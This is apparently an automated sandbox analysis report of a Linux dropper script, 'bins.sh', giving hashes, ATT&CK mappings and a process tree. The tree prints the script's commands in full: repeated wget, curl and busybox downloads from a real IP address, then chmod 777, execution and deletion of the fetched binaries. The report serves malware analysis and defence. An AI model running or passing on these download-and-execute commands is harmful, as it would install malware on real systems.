a6be12c3c8dd2355975f18dbeb450c1130df50f893548282b427c4933e1f15cf

Analysis

max time kernel
11s
max time network
132s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
13/03/2025, 01:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

2d3354e4454c0aa1442c15ae4db570d7
SHA1

fa41bc59a61d70fed29d83a9fadcaf5f29a0306c
SHA256

a6be12c3c8dd2355975f18dbeb450c1130df50f893548282b427c4933e1f15cf
SHA512

95586720bce8db9d47b64c0e4555ba8d6dbc2899295a18ef6cd7f80558ee39e4088f3b66a22e49846ab83dc5d6a5a07604f5b0ed412b9b40a3ff9867498d8e09
SSDEEP

192:vT3jmvfO3m3C3x3+3e35BNkJpg35J5B5uFpYb+2va224Gm6eQmp9lLWLqLzm+B+k:vT3jmvfO3m3C3x3+3e35BNkJpg3bvJb7

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1626	chmod
1632	chmod
1638	chmod
1650	chmod
1560	chmod
1487	chmod
1494	chmod
1506	chmod
1542	chmod
1572	chmod
1584	chmod
1596	chmod
1500	chmod
1518	chmod
1548	chmod
1644	chmod
1524	chmod
1530	chmod
1536	chmod
1554	chmod
1602	chmod
1608	chmod
1614	chmod
1620	chmod
1512	chmod
1566	chmod
1578	chmod
1590	chmod

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1509	wget
1510	curl
1511	busybox
1649	busybox
1651	z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
1513	z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
1514	rm
1647	wget
1648	curl
1652	rm

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:1479
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1480
- /usr/bin/wget
  wget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1481
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1485
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1486
- /bin/chmod
  chmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - File and Directory Permissions Modification
  PID:1487
- /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  ./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1488
- /bin/rm
  rm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1489
- /usr/bin/wget
  wget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1490
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1492
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1493
- /bin/chmod
  chmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - File and Directory Permissions Modification
  PID:1494
- /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  ./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1495
- /bin/rm
  rm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1496
- /usr/bin/wget
  wget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1497
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1498
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1499
- /bin/chmod
  chmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - File and Directory Permissions Modification
  PID:1500
- /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  ./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1501
- /bin/rm
  rm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1502
- /usr/bin/wget
  wget http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1503
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1504
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1505
- /bin/chmod
  chmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  ./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1507
- /bin/rm
  rm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1508
- /usr/bin/wget
  wget http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1509
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1510
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1511
- /bin/chmod
  chmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - File and Directory Permissions Modification
  PID:1512
- /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  ./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1513
- /bin/rm
  rm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1514
- /usr/bin/wget
  wget http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1515
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1516
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1517
- /bin/chmod
  chmod 777 kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  ./kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1519
- /bin/rm
  rm kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1520
- /usr/bin/wget
  wget http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1521
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1522
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1523
- /bin/chmod
  chmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  ./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1525
- /bin/rm
  rm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1526
- /usr/bin/wget
  wget http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1527
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1528
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1529
- /bin/chmod
  chmod 777 y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  ./y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1531
- /bin/rm
  rm y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1532
- /usr/bin/wget
  wget http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1533
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1534
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1535
- /bin/chmod
  chmod 777 wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  ./wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1537
- /bin/rm
  rm wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1539
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1540
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1541
- /bin/chmod
  chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  ./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1543
- /bin/rm
  rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1544
- /usr/bin/wget
  wget http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1545
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1546
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1547
- /bin/chmod
  chmod 777 j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  ./j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1549
- /bin/rm
  rm j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1550
- /usr/bin/wget
  wget http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1551
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1552
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1553
- /bin/chmod
  chmod 777 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  ./7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1555
- /bin/rm
  rm 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1556
- /usr/bin/wget
  wget http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1557
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1558
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1559
- /bin/chmod
  chmod 777 qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - File and Directory Permissions Modification
  PID:1560
- /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  ./qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1561
- /bin/rm
  rm qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1562
- /usr/bin/wget
  wget http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1563
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1564
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1565
- /bin/chmod
  chmod 777 ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  ./ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1567
- /bin/rm
  rm ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1568
- /usr/bin/wget
  wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1569
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1570
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1571
- /bin/chmod
  chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  ./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1573
- /bin/rm
  rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1574
- /usr/bin/wget
  wget http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1575
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1576
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1577
- /bin/chmod
  chmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  ./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1579
- /bin/rm
  rm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1580
- /usr/bin/wget
  wget http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1581
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1582
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1583
- /bin/chmod
  chmod 777 y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  ./y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1585
- /bin/rm
  rm y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1586
- /usr/bin/wget
  wget http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1587
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1588
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1589
- /bin/chmod
  chmod 777 wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  - File and Directory Permissions Modification
  PID:1590
- /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  ./wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1591
- /bin/rm
  rm wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:1592
- /usr/bin/wget
  wget http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1593
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1594
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1595
- /bin/chmod
  chmod 777 ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  - File and Directory Permissions Modification
  PID:1596
- /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  ./ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1597
- /bin/rm
  rm ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1598
- /usr/bin/wget
  wget http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1599
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1600
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1601
- /bin/chmod
  chmod 777 j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  - File and Directory Permissions Modification
  PID:1602
- /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  ./j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1603
- /bin/rm
  rm j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:1604
- /usr/bin/wget
  wget http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1605
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1606
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1607
- /bin/chmod
  chmod 777 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  - File and Directory Permissions Modification
  PID:1608
- /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  ./7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1609
- /bin/rm
  rm 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:1610
- /usr/bin/wget
  wget http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1611
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1612
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1613
- /bin/chmod
  chmod 777 qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - File and Directory Permissions Modification
  PID:1614
- /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  ./qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1615
- /bin/rm
  rm qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:1616
- /usr/bin/wget
  wget http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1617
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1618
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1619
- /bin/chmod
  chmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - File and Directory Permissions Modification
  PID:1620
- /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  ./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1621
- /bin/rm
  rm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:1622
- /usr/bin/wget
  wget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1623
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1624
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1625
- /bin/chmod
  chmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - File and Directory Permissions Modification
  PID:1626
- /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  ./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1627
- /bin/rm
  rm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:1628
- /usr/bin/wget
  wget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1629
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1630
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1631
- /bin/chmod
  chmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - File and Directory Permissions Modification
  PID:1632
- /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  ./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1633
- /bin/rm
  rm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:1634
- /usr/bin/wget
  wget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1635
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1636
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1637
- /bin/chmod
  chmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - File and Directory Permissions Modification
  PID:1638
- /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  ./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1639
- /bin/rm
  rm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:1640
- /usr/bin/wget
  wget http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1641
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1642
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1643
- /bin/chmod
  chmod 777 kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - File and Directory Permissions Modification
  PID:1644
- /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  ./kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1645
- /bin/rm
  rm kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:1646
- /usr/bin/wget
  wget http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1647
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1648
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1649
- /bin/chmod
  chmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - File and Directory Permissions Modification
  PID:1650
- /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  ./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1651
- /bin/rm
  rm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:1652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...